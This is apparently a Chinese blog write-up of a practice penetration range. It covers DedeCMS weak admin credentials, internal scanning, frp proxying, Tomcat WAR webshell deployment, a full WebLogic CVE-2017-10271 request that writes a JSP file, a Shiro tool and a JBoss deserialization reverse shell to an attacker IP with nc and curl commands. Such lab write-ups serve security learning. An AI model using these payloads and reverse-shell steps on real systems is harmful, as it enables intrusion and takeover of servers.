简单的靶场渗透

1
2
3
4
提示:一共12个flag,有内网。
标准:5个合格
靶场地址:http://1.14.65.168:8077/m/index.php
刚过完年,来玩一玩

[TOC]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
获得flag:
1.14.65.168
flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7}
flag1 : flag{f784234649d7ef161229349d1d76ba8d}

172.16.20.38tomcat
flag3 :flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

172.16.20.66
flag5 :flag{b717ca3e4543f05e6970ede833d68ba4}

172.16.20.76
flag4 :flag{22fceae28669c34d139f7ff6db690acb}

172.16.20.135
flag9 :flag{27e6221a8a55c8ee7396e74531dc7d9d}

信息收集

Powered by DedeCMSV57_UTF8_SP1

http://1.14.65.168:8077/data/admin/ver.txt 版本时间20170303

文件上传

http://1.14.65.168:8077/dede/ admin/admin 后台弱口令

后台任意文件上传

image-20220102150406908

哥斯拉连接,看了要提权

image-20220102151302899

html目录下 第一个flag{dc53e209ffa7f1cd8c7ebdc2eeff34a7} ,或者robots.txt 直接给的有路径

image-20220102151350497

根目录下 第二个flag{f784234649d7ef161229349d1d76ba8d}

image-20220102151427997

本机为172.16.20.66

image-20220102152600971

内网其他主机扫描

发现某位师傅的fscan(shadow1ng/fscan: 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 (github.com)),正好对内网172.16.20.* 网段存活主机扫描

image-20220102155438573

发现其他5台存活主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
(icmp) Target '172.16.20.38' is alive
(icmp) Target '172.16.20.62' is alive
(icmp) Target '172.16.20.66' is alive
(icmp) Target '172.16.20.76' is alive
(icmp) Target '172.16.20.135' is alive
icmp alive hosts len is: 5
172.16.20.38:8009 open
172.16.20.135:8009 open
172.16.20.66:1080 open
172.16.20.135:8080 open
172.16.20.76:8080 open
172.16.20.38:8080 open
172.16.20.62:7001 open
172.16.20.66:80 open
172.16.20.135:8093 open
172.16.20.135:8083 open
alive ports len is: 10
start vulscan
[*] WebTitle:http://172.16.20.62:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://172.16.20.62:7001 [weblogic]
[*] WebTitle:http://172.16.20.76:8080 code:302 len:0 title:None
[*] WebTitle:http://172.16.20.135:8083 code:400 len:0 title:None
[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10 title:Login Page
[*] WebTitle:http://172.16.20.38:8080 code:200 len:20 title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.16.20.135:8080 code:200 len:1507 title:Welcome to JBoss™
[*] WebTitle:http://172.16.20.66 code:200 len:12 title:我的网站
[+] InfoScan:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 [Shiro]
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf
[+] InfoScan:http://172.16.20.135:8080 [Jboss JBOSS]
[+] http://172.16.20.38:8080/manager/html tomcat tomcat
[+] http://172.16.20.38:8080 poc-yaml-tomcat-manager-week

挂代理

frp 代理出现两个问题,

1,我的frpc竟然不能运行,重新下载了

2,这个报错是frpc.ini里面的注释没有删除

image-20220102164513360

终于代理好了,

image-20220102164839124

下面就一个一个网站看吧

172.16.20.38 tomcat

image-20220102165200772

http://172.16.20.38:8080/manager/html

tomcat tomcat登陆,进入后台

image-20220102165822763

Tomcat 后台部署war木马getshell 哥斯拉生成shel.jsp,jar -cvf sh.war shel.jsp

image-20220102172206117

image-20220102173735362

http://172.16.20.38:8080/sh/shel.jsp

image-20220102173917456

拿到flag3 :flag{03bbcaf39bdd08fa8d0d9e5477e102c5}

image-20220102174042500

root权限,双网卡发现inet 10.2.5.20/20 brd 10.2.15.255 scope global eth1 另一个网段10.2.5.*

image-20220102174312642

image-20220102174301803

172.16.20.62 weblogic

http://172.16.20.62:7001 fscan扫出来的是weblogic

1
2
3
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2020-14750
[+] http://172.16.20.62:7001 poc-yaml-weblogic-cve-2017-10271
[+] http://172.16.20.62:7001 poc-yaml-weblogic-ssrf

能访问http://172.16.20.62:7001/wls-wsat/CoordinatorPortType11说明可能存在cve-2017-10271漏洞

image-20220102181059955

我说咋不能利用exp,原来,burp没有挂代理。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 172.16.20.62:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 3282

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/1.jsp</string><void method="println">
<string>
<![CDATA[<% out.print("test"); %>]]></string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>



<% out.print("test"); %> 换成对应jsp🐎

image-20220103003302676

http://172.16.20.62:7001/wls-wsat/1.jsp

image-20220103003242901

哥斯拉链接

image-20220103002839036

root用户,无其他网段

image-20220103002921369

flag5 :flag{b717ca3e4543f05e6970ede833d68ba4}

image-20220103003009202

172.16.20.76 Shiro

[*] WebTitle:http://172.16.20.76:8080/login;jsessionid=0DDFC6D0809CA87D818E92B67A8CFC33 code:200 len:10 title:Login Page

确定为Shiro

用工具https://github.com/j1anFen/shiro_attack/releases

image-20220103021106383

image-20220103021136691

image-20220103021026217

172.16.20.135 JBoss

image-20220102231302358

image-20220102230723865

确定版本可以使用CVE-2017-7504 [JBoss 4.x JBossMQ JMS 反序列化漏洞]([(CVE 2017 7504)JBoss 4.x JBossMQ JMS 反序列化漏洞 - Wiki (96.mk)](https://wiki.96.mk/Web安全/Jboss/反序列化漏洞/(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞/))

1
2
3
4
5
6
7
sudo git clone https://github.com/ianxtianxt/CVE-2015-7501.git

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.192:4444(IP是攻击机ip,4444是要监听的端口)

nc -lvnp 4444
curl http://172.16.20.135:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

image-20220102233858765

root权限

image-20220102234228765

inet 10.2.5.62/20 brd 10.2.15.255 scope global eth1 发现10.2.5.*网段

image-20220102234258565


干不动了,二层三层内网后续更新,哎实际上就是代理+漏洞复现。

感悟:第一是工具,第二是漏洞不是很敏感

  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信